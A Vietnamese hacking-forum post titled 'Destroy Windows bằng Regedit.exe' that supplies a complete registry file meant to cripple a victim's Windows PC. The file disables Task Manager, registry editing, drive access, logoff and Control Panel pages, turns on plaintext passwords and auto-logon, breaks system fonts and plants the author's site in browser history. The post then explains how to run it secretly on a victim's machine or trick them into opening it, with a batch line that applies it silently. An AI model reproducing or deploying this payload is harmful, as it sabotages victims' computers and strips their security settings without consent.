HACKIS - Hacking Internet Security
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Destroy Windows bằng Regedit.exe  EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Destroy Windows bằng Regedit.exe  EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Destroy Windows bằng Regedit.exe  EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Destroy Windows bằng Regedit.exe  EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Destroy Windows bằng Regedit.exe  EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Destroy Windows bằng Regedit.exe  EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Destroy Windows bằng Regedit.exe  EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Destroy Windows bằng Regedit.exe  EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Destroy Windows bằng Regedit.exe  EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum


Destroy Windows bằng Regedit.exe

Go down

Destroy Windows bằng Regedit.exe  Empty Destroy Windows bằng Regedit.exe

Post  Admin Fri Feb 18, 2011 3:31 am

Sau khi Windows âm thầm bị destroy bằng Regedit , victim cứ ngỡ cái PC hằng ngày mình nâng niu giờ đây không phải là của mình nữa....!?! Để destroy windows bạn cần thực hiện 2 bước sau :

Bước 1 :

Copy đoạn code dưới đây, dán vào notepad rồi save as thành file deswin.reg ( hoặc tên gì bạn thích ) :

Code:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Hack+Crack=Enjoy"

[HKEY_CURRENT_USER\Control Panel\International]
"s1159"="HCE"
"s2359"="tungxeng"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
"url1"="http://www.tungxeng.net.ms"
"url2"="http://www.tungxeng.net.ms"
"url3"="http://www.tungxeng.net.ms"
"url4"="http://www.tungxeng.net.ms"
"url5"="http://www.tungxeng.net.ms"
"url6"="http://www.tungxeng.net.ms"
"url7"="http://www.tungxeng.net.ms"
"url8"="http://www.tungxeng.net.ms"
"url9"="http://www.tungxeng.net.ms"
"url10"="http://www.tungxeng.net.ms"

[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"="999"
"ScreenSaveActive"=dword:00000001
"ScreenSaveTimeOut"=1
"WheelScrollLines"="0 - 0xFFFFFFFF"
"MinAnimate"=dword:00000000
"DragFullWindows"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoClose"=dword:00000001
"NoFind"=dword:00000001
"NoSetTaskbar"=dword:00000001
"NoSetFolder"=dword:00000001
"NoPrinterTab"=dword:00000001
"NoAddPrinter"=dword:00000001
"NoDeletePrinter"=dword:00000001
"NoSaveSettings"=dword:00000001
"NoNetHood"=dword:00000001
"NoDrives"=dword:67108863
"NoDesktop"=dword:00000001
"NoSetActiveDesktop"=dword:00000001
"NoFolderOptions"=dword:00000001
"NoFavoritesMenu"=dword:00000001
"NoRecentDocsMenu"=dword:00000001
"NoLogOff"=01 00 00 00
"NoDriveTypeAutoRun"=hex:95,00,00,00
"CDRAutoRun"=hex:00,00,00,00
"NoViewContextMenu"=dword:00000001
"NoToolbarCustomize"=dword:00000001
"NoBandCustomize"=dword:00000001
"NoInstrumentation"=dword:00000001
"NoNetHood"=dword:00000001
"NoNetConnectDisconnect"=dword:00000001
"NoTrayContextMenu"=dword:00000001
"ScreenSaveActive"=dword:00000000
"ScreenSaveIsSecure"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoEntrireNetwork"=dword:00000001
"NoWorkgroupContents"=dword:00000001
"NoFileSharingControl"=dword:00000001
"NoPrintSharingControl"=dword:00000001
"NoNetSetup"=dword:00000001
"NoNetSetupIDPage"=dword:00000001
"NoNetSetupSecurityPage"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoDispAppearancePage"=dword:00000001
"NoDispSettingsPage"=dword:00000001
"NoDispScrSavPage"=dword:00000001
"NoDispBackgroundPage"=dword:00000001
"NoDispCPL"=dword:00000001
"NoDevMgrPage"=dword:00000001
"NoFileSysPage"=dword:00000001
"NoProfilePage"=dword:00000001
"NoVirtMemPage"=dword:00000001
"NoPwdPage"=dword:00000001
"NoAdminPage"=dword:00000001
"NoSecPCL"=dword:00000001
"DisabledRegstryTools"=dword:00000001
"DisableTaskManager"=dword:00000001
"DisableTaskMgr"=hex:01

[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserOptions"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000001
"NoRealMode"=dword:00000001

[HKEY_CURRENT_USER\Control Panel\Mouse]
"ActiveWindowTracking"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"BackBitmap"="C:\..."

[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics]
" Shell Icon BPP"="4"

[HKEY_USERS\.Default\ControlPanel\Colors]
"Background"="0 0 0 - 255 255 255"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"="Hi !"
"LegalNoticeText"="I'm huutung_2001@yahoo.com, welcome http://tungxeng.net.ms"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDRom]
"Autorun"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
"RegisteredOrganization"="HCE"
"RegisteredOwner"="huutung_2001@yahoo.com"
"ProductName"="Hack+Crack=Enjoy"
"Version"="2/11/1979"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control]
"Current User"="huutung_2001@yahoo.com"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName]
"ComputerName"="HCE"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"SourcePath"="C:\WINDOWS"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000001
"AutoShareWks"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]
"DisablePwdCaching"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters]
"DisableSavePassword"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DontDisplayLastUserName"=dword:00000001
"AutoAdminLogon"="1"
"AllocateFloppies"="0"
"AllocateCDRoms"="0"
"EnableQuickReboot"="0"
"IgnoreShiftOveride"="1"
"PowerDownAfterShutDown"="0"
"LogonPrompt"="I'm huutung_2001@yahoo.com, welcome http://tungxeng.net.ms"
"Welcome"="Hi !"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize]
"Fixedfon.fon"="1.fon"
"Fonts.fon"="2.fon"
"Oemfont.fon"="3.fon"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\fontsize\120\System]
"8514sys.fon"="1.fon"
"8514fix.fon"="2.fon"
"8514oem.fon"="3.fon"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\fontsize\96\System]
"vgasys.fon"="1.fon"
"vgafix.fon"="2.fon"
"vgaoem.fon"="3.fon"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Rdr\Parameters]
"EnablePlainTextPassword"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NameNumericTail"=dword:00000001

[HKEY_LOCAL_MACHINE\Network\Logon]
"username"="huutung_2001@yahoo.com"

Bước 2 :
Bây giờ chỉ cần chạy file deswin.reg trên máy của victim là xong. Nếu bạn lén tự làm điều đó thì tốt quá , nhưng nếu bạn không làm được ( victim không cho ai sờ đến máy của mình ) , bạn đành phải dụ victim click vào link nối với file reg thôi. Và có một trục trặc nhỏ là nếu victim click vào file reg thì một thông báo xuất hiện hỏi victim có muốn add thông tin từ file reg vào registry không. Victim nào đã từng học qua Regedit thì không bao giờ họ click OK đâu. Như thế không có nghĩa là hết cách , bạn có thể tạo 1 file exe rồi dụ victim chạy file đó . Khi được kích hoạt, file exe sẽ tự động add tham số từ file reg vào registry ( vd bạn có thể lập trình bằng Visual Basic...). Ở đây tôi đưa ra 1 ví dụ đơn giản là bạn tạo 1 file BAT ( giống file autoexec.bat) với dòng lệnh sau :
Regedit.exe /s Deswin.reg

tham số /s sẽ giúp ta add tất cả những gì có trong file deswin.reg vào registry mà không cần hỏi victim một câu nào Smile)
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum